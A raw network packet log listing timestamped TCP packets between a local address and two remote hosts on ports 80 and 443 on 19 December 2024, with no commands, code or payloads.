                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.534765005 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.534778118 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.534785032 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.534811020 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.534845114 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.535556078 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.535603046 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.535609007 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.535614967 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.535640955 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.535679102 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.536283016 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.536295891 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.536307096 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.536334991 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.536379099 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.537067890 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.537334919 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.537900925 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.537910938 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.537921906 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.537946939 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.537987947 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.538582087 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.538593054 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.538604021 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.538614988 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.538638115 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.538677931 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.657267094 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.657280922 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.657293081 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.657371044 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.657397032 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.657664061 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.657702923 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.657772064 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.657816887 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.658102989 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.658116102 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.658129930 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.658144951 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.658163071 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.658179045 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.658642054 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.658652067 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.658689022 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.658881903 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.658894062 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.658931971 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.659223080 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.659235001 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.659279108 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.661288023 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.661300898 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.661314011 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.661348104 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.661407948 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.662156105 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.662250996 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.663512945 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.663525105 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.663569927 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.664207935 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.664222002 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.664267063 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.664305925 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.666028023 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.666104078 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.666991949 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.667006016 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.667016029 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.667051077 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.667074919 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.668379068 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.668427944 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.668962002 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.668975115 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.668987036 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.669013977 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.669049978 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.671092987 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.671106100 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.671117067 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.671180964 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.671201944 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.671870947 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.671914101 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.673365116 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.673377991 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.673422098 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.674186945 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.674200058 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.674211979 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.674247980 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.674266100 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.674952030 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.674964905 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.674977064 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.674997091 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.675017118 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.715073109 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.715142965 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.715179920 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.715193033 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.715217113 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.715235949 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.715682983 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.715725899 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.715899944 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.715914011 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.715945959 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.716325998 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.716370106 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.716552973 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.716564894 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.716578007 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.716590881 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.716618061 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.717323065 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.717382908 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.718151093 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.718219995 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.718230963 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.718257904 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.718308926 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.718620062 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.718631983 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.718657017 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.718673944 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.719085932 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.719098091 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.719110966 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.719130039 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.719149113 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.719927073 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.719939947 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.719952106 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.719971895 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.719994068 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.720563889 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.720577955 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.720590115 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.720597982 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.720621109 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.721098900 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.721110106 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.721121073 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.721160889 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.721180916 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.721863031 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.721874952 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.721887112 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.721915007 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.721935034 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.722606897 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.722620964 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.722632885 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.722645998 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.722671032 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.722698927 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.723360062 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.723376989 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.723388910 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.723426104 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.724113941 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.724128008 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.724138975 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.724168062 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.724200010 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.724910975 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.724922895 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.724935055 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.724947929 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.724961996 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.725003004 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.725644112 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.725656986 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.725668907 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.725684881 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.725708008 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.726458073 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.726494074 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.726506948 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.726537943 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.727138996 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.727152109 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.727164030 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.727178097 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.727189064 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.727209091 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.727921009 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.727935076 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.727946997 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.727972984 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.728005886 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.728694916 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.728708029 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.728732109 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.728753090 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.729439020 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.729453087 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.729464054 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.729477882 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.729476929 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.729504108 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.729528904 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.730160952 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.730173111 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.730185032 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.730223894 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.730251074 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.730901957 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.730914116 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.730952978 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.765919924 CET49749443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.765958071 CET44349749172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.766151905 CET49750443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.766155958 CET49749443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.766155958 CET49751443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.766182899 CET44349751172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.766194105 CET44349750172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.766288996 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.766309023 CET49751443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.766314983 CET49750443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.766319990 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.766443968 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.766812086 CET49749443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.766813040 CET49750443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.766824007 CET44349749172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.766828060 CET44349750172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.766947031 CET49751443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.766954899 CET44349751172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.767158031 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.767180920 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.849210024 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.849302053 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.849328041 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.849342108 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.849371910 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.849386930 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.849891901 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.849956989 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.850126982 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.850140095 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.850167036 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.850205898 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.850589991 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.850601912 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.850655079 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.850877047 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.850888968 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.850900888 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.850915909 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.850929976 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.850965977 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.851824999 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.851838112 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.851849079 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.851870060 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.851897001 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.852515936 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.852562904 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.856323957 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.856347084 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.856363058 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.856374979 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.856384039 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.856386900 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.856398106 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.856439114 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.856439114 CET4974380192.168.2.431.41.244.11
